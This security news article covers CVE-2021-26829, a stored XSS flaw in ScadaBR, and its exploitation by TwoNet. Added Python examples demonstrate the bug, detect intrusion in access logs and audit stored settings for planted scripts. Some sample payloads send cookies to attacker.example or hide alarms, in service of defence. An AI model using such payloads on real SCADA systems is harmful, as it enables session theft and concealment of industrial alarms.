CVE-2021-26829 Added to CISA KEV After Active Exploitation of OpenPLC ScadaBR


The CVE-2021-26829 vulnerability has been added to the U.S. Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (KEV) catalog following confirmed in-the-wild exploitation targeting industrial control systems. The flaw affects OpenPLC ScadaBR, a supervisory control and data acquisition (SCADA) platform used in education, industrial automation, energy environments, and small-to-mid-sized SCADA deployments. According to CISA, the vulnerability has been actively leveraged by threat actors, prompting a government-wide remediation deadline and renewed concern about attacks targeting critical infrastructure software.

CVE-2021-26829 is a stored cross-site scripting (XSS) vulnerability in the system_settings.shtm component of affected OpenPLC ScadaBR installations. Windows versions up to and including 1.12.4 and Linux versions up to and including 0.9.1 are impacted. An attacker who can reach the settings form, for example through default credentials or an exposed administrative panel, can store a persistent JavaScript payload that runs in the browser of every privileged user who later loads the tampered configuration page. Exploitation can result in credential theft, session hijacking, modification of control logic parameters, or unauthorized interface manipulation that degrades the visibility and stability of industrial operations.

CISA's decision to add CVE-2021-26829 to the KEV catalog follows evidence that real-world attackers, including the pro-Russian hacktivist collective TwoNet, have weaponized the flaw in recent incidents. TwoNet was observed exploiting the vulnerability against what it believed to be a Brazilian water treatment facility, not realizing the system was a honeypot operated by security researchers. The attackers obtained access through default credentials, created a new administrative user to maintain persistence, defaced the login page using the XSS flaw, and attempted to disable alarms and logs through interface manipulation. The activity demonstrates that even a medium-severity XSS vulnerability can be operationally meaningful when it affects the human-machine interface (HMI) of an industrial system.

Background Of The CVE-2021-26829 Vulnerability

OpenPLC ScadaBR is a widely known open source SCADA platform used in industrial automation laboratories, energy grid training environments, building management systems, and small-scale industrial deployments. While many large enterprises rely on proprietary SCADA technologies, ScadaBR remains common in smaller facilities that need cost-effective human-machine interface capabilities. The vulnerability added to CISA's KEV catalog is a stored cross-site scripting issue affecting ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows.

Stored XSS differs from reflected XSS in that the malicious payload is saved in the backend data store. The payload therefore fires every time a user loads the affected page, not only when an attacker tricks a user into clicking a specially crafted link. In ScadaBR, the vulnerable system_settings.shtm component is part of the configuration interface used by system administrators, which gives the attacker a leverage point that directly affects sensitive control settings and the sessions of the most privileged users.

The impact is compounded by the fact that many industrial facilities operate with poor network segmentation, outdated SCADA software, and shared credentials. In addition, internet-exposed ScadaBR instances remain relatively common, and many are discoverable through search engines such as Shodan. These conditions make the vulnerability attractive to hacktivists, criminal groups, and opportunistic attackers whose goal is disruption rather than stealthy persistence.

Why CVE-2021-26829 Was Added To The CISA KEV Catalog

CISA's Known Exploited Vulnerabilities catalog is reserved for vulnerabilities with confirmed evidence of active exploitation that pose significant risk to the federal enterprise. Although the CVSS base score for CVE-2021-26829 is 5.4 (Medium), the real-world impact is driven by contextual factors: the sensitivity of SCADA systems, the ease of exploitation, and the number of unpatched installations performing critical functions.

In the observed incident involving TwoNet, the attackers moved from initial access to disruptive action within approximately 26 hours. They did not escalate privileges through kernel-level exploits. Instead, they used default credentials, simple enumeration, direct interface manipulation, and the XSS flaw to make visible changes in the human-machine interface. This shows that a SCADA compromise does not always require sophisticated malware or a supply chain attack; weak configuration combined with a vulnerability like CVE-2021-26829 can be enough.

The KEV listing imposes a mandatory remediation deadline of December 19, 2025, for federal agencies. While CISA cannot enforce requirements on private sector operators, it strongly encourages all organizations to patch affected ScadaBR installations or apply compensating controls as part of their vulnerability management process.

Technical Analysis Of CVE-2021-26829

The vulnerability exists because user-supplied input submitted through system_settings.shtm is stored without validation and later rendered into the page template without output encoding. When a privileged user views the settings interface, the stored JavaScript executes in the browser with the privileges and session context of that user, so the attacker does not need the victim's credentials to act as that user within the application.
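As an added illustration (not ScadaBR's own code and not taken from the advisory), the defect class described above modelled in Python: a stored setting concatenated into an HTML attribute and a text node with no output encoding, beside the same page rendered with context-aware encoding. The field name instanceDescription, the host attacker.example and the payload are assumptions for this example. The block also shows why stripping `<script>` tags on input, a common first reaction, does not close the hole.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed attacker value, as it would sit in the settings store after being
# submitted through the vulnerable form. The host attacker.example and the field
# name instanceDescription are assumptions for this example, not ScadaBR's own.
ATTACKER_VALUE = (
    '"><img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">'
)


def strip_script_tags(value):
    """Input-side 'sanitiser' that only removes <script> elements. Included to
    show why blocklisting on input is not a fix for stored XSS."""
    return re.sub(r"(?is)<script\b.*?</script>", "", value)


def render_vulnerable(stored_value):
    """Concatenates the stored setting into an attribute and a text node with no
    output encoding: the defect class described for system_settings.shtm,
    modelled here rather than copied from ScadaBR's template."""
    return (f'<input name="instanceDescription" value="{stored_value}">'
            f"<span>{stored_value}</span>")


def render_hardened(stored_value):
    """Same markup with context-aware output encoding. escape(quote=True) turns
    <, >, &, " and ' into entities, so the value can neither close the
    attribute nor start a new element in the text node."""
    safe = escape(stored_value, quote=True)
    return (f'<input name="instanceDescription" value="{safe}">'
            f"<span>{safe}</span>")


class _ScriptProbe(HTMLParser):
    """Tokenises the rendered markup the way a browser would and records any
    script element or on* event-handler attribute that results."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append((tag, None))
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append((tag, name))


def executes(markup):
    """True if the rendered page contains attacker-controlled executable content."""
    probe = _ScriptProbe()
    probe.feed(markup)
    probe.close()
    return bool(probe.hits)


if __name__ == "__main__":
    print("vulnerable render executes:", executes(render_vulnerable(ATTACKER_VALUE)))
    print("hardened render executes:  ", executes(render_hardened(ATTACKER_VALUE)))
    print("after stripping <script>:  ",
          executes(render_vulnerable(strip_script_tags(ATTACKER_VALUE))))
```

The hardened rendering makes no attempt to recognise bad input; it encodes every value on output, which is the control that actually holds because it does not depend on guessing the attacker's syntax. Input validation (length, character class) is still worth adding for settings with a well-defined format, but as defence in depth rather than the primary fix.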

Key technical risks include:

- Theft of credentials or session cookies from the privileged user who loads the page
- Hijacking of the administrator's authenticated session to perform actions within the application
- Modification of control logic parameters and other configuration values
- Unauthorized manipulation of the interface, including hiding alarms or altering displayed values

In industrial environments, these actions can have significant consequences. If a malicious script alters displayed tank levels, temperature readings, pump states, or voltage indicators, physical processes may be affected without operators realizing what is happening. This class of vulnerability is therefore treated as high risk in an ICS context despite its moderate CVSS score.

Real World Exploitation And Threat Actor Behavior

TwoNet, the threat actor associated with the recent exploitation, has evolved from a group running distributed denial of service (DDoS) campaigns into a multifaceted operation with links to ransomware, hack-for-hire offerings, industrial system targeting, doxxing, and initial access brokerage. The group frequently advertises its capabilities on Telegram, and the ScadaBR incident shows that it has adopted practical tactics that align with common attacker playbooks.

Their attack path in the honeypot incident included:

- Initial access to the ScadaBR web interface using default credentials
- Creation of a new administrative user to maintain persistence
- Defacement of the login page by storing a payload through the XSS flaw
- Attempts to disable alarms and logging through the interface

This pattern reflects a growing trend in which hacktivist groups adopt simple but effective tactics that disrupt visibility within industrial systems. The low barrier to entry and the availability of publicly documented vulnerabilities make SCADA software a convenient target for threat actors seeking attention or political impact.
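Detection logic for the access pattern described above, added here as an example and not taken from the article or from the researchers who ran the honeypot: it reads Tomcat-style access log lines, groups them by client address, and flags both a settings write from an address outside the engineering allowlist and the full login, user creation, settings write chain inside a time window. The log lines are constructed. Only system_settings.shtm comes from the CVE; /ScadaBR/login.htm and /ScadaBR/users.shtm are assumed page names that must be matched against the deployed version, and ScadaBR performs many writes through DWR calls rather than the .shtm page itself, so the stage patterns will need tuning.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Tomcat-style access log lines (combined format, no request
# bodies). Addresses and timestamps are invented for this example.
SAMPLE_LOG = """\
192.168.10.5 - - [01/Feb/2025:08:00:00 +0000] "GET /ScadaBR/watch_list.shtm HTTP/1.1" 200 5120
203.0.113.45 - - [01/Feb/2025:14:02:11 +0000] "POST /ScadaBR/login.htm HTTP/1.1" 302 -
203.0.113.45 - - [01/Feb/2025:14:03:40 +0000] "POST /ScadaBR/users.shtm HTTP/1.1" 200 1843
203.0.113.45 - - [01/Feb/2025:14:09:05 +0000] "POST /ScadaBR/system_settings.shtm HTTP/1.1" 200 2210
203.0.113.45 - - [02/Feb/2025:15:50:02 +0000] "POST /ScadaBR/event_handlers.shtm HTTP/1.1" 200 990
192.168.10.5 - - [02/Feb/2025:09:10:00 +0000] "POST /ScadaBR/system_settings.shtm HTTP/1.1" 200 2210
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Ordered stages of the takeover chain. Only system_settings.shtm is named by
# the CVE; login.htm and users.shtm are ASSUMED page names for this example.
STAGES = (
    ("login", "POST", "/ScadaBR/login.htm"),
    ("user_admin_write", "POST", "/ScadaBR/users.shtm"),
    ("settings_write", "POST", "/ScadaBR/system_settings.shtm"),
)


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def _stage_of(event):
    """Name of the chain stage this request represents, if any (successful only)."""
    for name, method, path in STAGES:
        if event["method"] == method and event["path"] == path and event["status"] < 400:
            return name
    return None


def find_findings(log_text, trusted_ips=(), window=timedelta(hours=48)):
    """Return findings: a medium one per settings write from an untrusted address,
    and a high one per client that completes all STAGES in order within window."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        for ev in events:
            if _stage_of(ev) == "settings_write" and ip not in trusted_ips:
                findings.append({"ip": ip, "severity": "medium",
                                 "kind": "settings_write_from_untrusted_ip",
                                 "at": ev["ts"]})
        idx, start = 0, None
        for ev in events:
            if _stage_of(ev) != STAGES[idx][0]:
                continue
            start = start or ev["ts"]
            idx += 1
            if idx == len(STAGES):
                if ev["ts"] - start <= window:
                    findings.append({"ip": ip, "severity": "high",
                                     "kind": "admin_takeover_sequence",
                                     "start": start, "end": ev["ts"]})
                break
    return findings


if __name__ == "__main__":
    for f in find_findings(SAMPLE_LOG, trusted_ips=("192.168.10.5",)):
        print(f)
```

The medium-severity rule alone is enough to catch an internet-facing instance being reconfigured, which is the condition the article says is still common; the ordered chain exists to separate an attacker's first session from an engineer's routine change without needing request bodies, which Tomcat does not log by default.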

Industrial Impact And Infrastructure Risk

Although ScadaBR is not generally used by large military or national utilities, it is widely deployed in local energy systems, building control environments, small treatment facilities, academic labs, and private industrial operations. A compromise in any of these environments can lead to loss of monitoring visibility, unsafe configuration changes, or opportunistic sabotage.

Many facilities run ScadaBR in test benches or training deployments that are connected to the wider network, and these deployments can serve as pivot points for lateral movement. An attacker who compromises a ScadaBR instance inside an industrial facility may be able to reach other devices, including programmable logic controllers, historian databases, engineering workstations, and building management systems.

Why SCADA XSS Vulnerabilities Are More Dangerous Than Web XSS

Web-based cross-site scripting vulnerabilities are often treated as low severity, but in SCADA systems the consequences can be operationally significant. When interface values represent physical processes, any manipulation of those values can cause harm. A payload delivered through CVE-2021-26829 can alter what operators see, hide alarms, or present false readings.

Unlike banking or e-commerce interfaces, SCADA systems directly influence pumps, valves, actuators, and environmental controls. A single manipulated page can lead to delayed responses, unintended equipment states, or incorrect human decisions.

CISA And Industry Guidance For CVE-2021-26829

CISA urges all operators to apply available patches or remove affected systems from exposed networks. The recommendation aligns with Binding Operational Directive 22-01, which requires federal agencies to reduce their exposure to known exploited vulnerabilities. Private sector operators should apply similar urgency given the increasing frequency of industrial system targeting by criminal and hacktivist actors.

Organizations are encouraged to take the following steps:

- Verify the installed ScadaBR version and apply the available patch or upgrade
- Remove ScadaBR instances from internet exposure and segment them from corporate networks
- Replace default and shared credentials and review the user list for accounts that should not exist
- Audit stored configuration, including the system settings page, for injected scripts
- Apply compensating controls where patching is not immediately possible

Operators should also scan the endpoints and workstations used to access SCADA consoles. Endpoint protection tools such as Malwarebytes can detect malicious scripts, keyloggers, backdoors, or other unwanted programs that may have been installed after an operator viewed a compromised interface. Because the vulnerability executes in the browser, an infected operator workstation could give an attacker access well beyond the SCADA console itself.

Wider Threat Landscape And Connected Activity

The addition of CVE-2021-26829 to the KEV catalog coincides with a separate trend identified by VulnCheck. Researchers reported a long-running exploit operation driven by an out-of-band application security testing (OAST) endpoint hosted on Google Cloud. The operation has conducted over 1,400 exploit attempts across 200 different CVEs, with a regional focus on Brazil. The activity shows how threat actors use legitimate cloud infrastructure to blend scanning operations into normal traffic.

The infrastructure used in these attempts is linked to subdomains under detectors testing dot com. Payloads include modified variants of public exploits, such as Fastjson remote code execution, adapted into Java class files that accept commands and relay responses to attacker-controlled URLs. While this activity is not directly tied to CVE-2021-26829, it illustrates how industrial systems and public-facing web applications are probed in parallel by threat actors using commodity tooling and mainstream hosting providers.

Summary Of Affected Versions

OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows are affected. Users of ScadaBR should verify their installation version and review configuration settings to confirm whether the system already contains malicious stored scripts placed by attackers. Regular auditing of configuration pages, backups, templates, and custom scripts is recommended to ensure integrity.
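A small audit routine for the review just described, added here as an example and not part of the article or the ScadaBR project: given a snapshot of stored settings (however the operator pulls them, for instance from the database or a configuration export, which is not shown), it peels URL encoding and HTML entities and flags values carrying script tags, inline event handlers, javascript: URIs or active embeds. The setting names and values in SAMPLE_SETTINGS are constructed and are not ScadaBR's real setting keys.

```python
import html
import re
from urllib.parse import unquote

# Constructed snapshot of stored settings. Keys are illustrative, NOT ScadaBR's
# actual setting names; values are invented. One clean HTML value (notes) is
# included so the audit is shown not to fire on mere markup.
SAMPLE_SETTINGS = {
    "instanceDescription": "Plant A / Water Line 2",
    "emailSmtpHost": "smtp.internal.example",
    "loginBanner": '<img src=x onerror="document.querySelector(\'#alarms\').style.display=\'none\'">',
    "reportFooter": "%3Cscript%3Efetch%28%27http%3A%2F%2Fattacker.example%2F%27%2Bdocument.cookie%29%3C%2Fscript%3E",
    "supportLink": "&lt;a href=&quot;javascript:alert(1)&quot;&gt;help&lt;/a&gt;",
    "notes": "Check <b>pump 3</b> before 17:00",
}

# Indicators of executable content. The event_handler pattern requires the on*
# attribute to sit inside a tag, which keeps plain text such as "turn on=" quiet.
INDICATORS = (
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"<[a-z][^>]*\son[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("active_embed", re.compile(r"<\s*(?:iframe|svg|object|embed)\b", re.I)),
)


def normalize(value, max_rounds=3):
    """Strip URL encoding and HTML entities repeatedly, up to max_rounds times.
    Returns the decoded text and how many rounds changed it; a legitimate
    setting rarely needs any, so a non-zero count is itself suspicious."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def audit_settings(settings):
    """Return one finding per setting whose decoded value matches an indicator."""
    findings = []
    for key, raw in settings.items():
        if not isinstance(raw, str):
            continue
        text, rounds = normalize(raw)
        for name, pattern in INDICATORS:
            if pattern.search(text):
                findings.append({"key": key, "indicator": name,
                                 "decode_rounds": rounds, "value": raw[:80]})
                break
    return findings


if __name__ == "__main__":
    for finding in audit_settings(SAMPLE_SETTINGS):
        print(finding)
```

Run it against a fresh export after patching as well as before: the patch stops new payloads from rendering, but values already sitting in the store remain there until someone removes them, and a later downgrade or restore from backup would bring them back.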
